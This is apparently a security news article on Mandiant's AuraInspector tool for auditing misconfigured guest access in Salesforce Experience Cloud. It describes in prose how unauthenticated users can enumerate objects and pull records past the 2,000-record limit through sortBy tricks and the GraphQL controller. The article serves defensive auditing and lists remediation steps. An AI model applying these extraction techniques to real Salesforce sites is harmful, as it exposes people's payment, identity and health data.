Mandiant has released AuraInspector, an open-source command-line tool designed to help security teams identify and audit access control misconfigurations within the Salesforce Aura framework that could expose sensitive data, including credit card numbers, identity documents, and health information.
The tool addresses a critical gap in Salesforce Experience Cloud security, where complex sharing rules and multi-level permission configurations often create blind spots for administrators.
AuraInspector automates detection of these exposures from an external perspective, providing actionable insights for remediation before attackers can exploit them.
Aura serves as the foundational technology behind Salesforce’s Lightning Experience, enabling modern single-page application functionality.
While this architecture improves user experience, it also introduces security complexities. The Aura endpoint, which front-end components use to retrieve backend data, has become one of the most targeted interfaces in Salesforce Experience Cloud applications.
Mandiant’s research reveals that misconfigurations frequently grant guest users unauthorized access to sensitive objects.
In controlled testing, the firm demonstrated that improperly configured Account object permissions could allow unauthenticated users to retrieve thousands of records via legitimate Aura methods such as getItems.
Technical Capabilities
AuraInspector automates several previously manual techniques for identifying misconfigurations.
The tool tests the getConfigData method to enumerate accessible objects, then uses the getItems method to retrieve records while implementing “action bulking” to optimize performance bundling up to 100 actions per request to minimize network traffic.
A key innovation involves leveraging the sortBy parameter to bypass Salesforce’s 2,000-record retrieval limit.
By sorting results on different fields in ascending or descending order, security researchers can demonstrate the full impact of misconfigurations and retrieve substantially more records than standard methods allow.
The tool also identifies Record Lists associated with objects, detects accessible Home URLs that may lead to administration panels, and checks self-registration status critical since Salesforce has strengthened default Guest account security, making authenticated access increasingly valuable to attackers.
Perhaps most significantly, AuraInspector incorporates a previously undocumented technique using Salesforce’s GraphQL Aura controller to overcome pagination limitations.
While the standard Aura API restricts users to 2,000 records per query, the GraphQL controller enables consistent retrieval of all records tied to an object through improved pagination using cursor-based navigation.
The GraphQL approach, accessible to unauthenticated users by default, provides standardized record retrieval, built-in introspection for field discovery, and support for mutations to test write privileges.
Mandiant identified a Spark instance administration dashboard accessible to any unauthenticated user via this method.
Mandiant confirmed with Salesforce that this represents expected functionality when permissions are correctly configured, but in misconfigured environments, it dramatically amplifies potential data exposure.
All identified issues stem from configuration errors rather than product vulnerabilities. Salesforce administrators should audit Guest User permissions regularly, applying least privilege principles to ensure unauthenticated users can only access objects and fields essential for public functionality.
The cursor is a Base64-encoded string indicating the latest record retrieved, so it can easily be built from scratch. With batches of 2,000 records.
Reviewing sharing rules and organization-wide defaults ensures authenticated users access only explicitly permitted records.
Mandiant has also provided detection resources including a Burp Suite BCheck for identifying hidden Salesforce references in JavaScript files and a Google SecOps UDM query to flag POST requests to Aura endpoints, enabling organizations to monitor for potential reconnaissance activity.
Turning off unnecessary self-registration prevents unauthorized account creation, while following Salesforce’s Security Guide recommendations including use of the Security Health Check tool helps maintain robust configurations.
AuraInspector is available immediately on GitHub, where Mandiant has released the core detection capabilities while withholding data extraction functionality to prevent misuse.
The tool automatically discovers Aura endpoints, retrieves Home and Record List URLs, and determines self-registration status all through read-only operations that leave target instances unmodified.
For organizations requiring comprehensive Salesforce security assessments, Mandiant Consulting offers specialized services to identify misconfigurations, validate security postures, and ensure compliance with best practices for protecting sensitive data in cloud environments.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.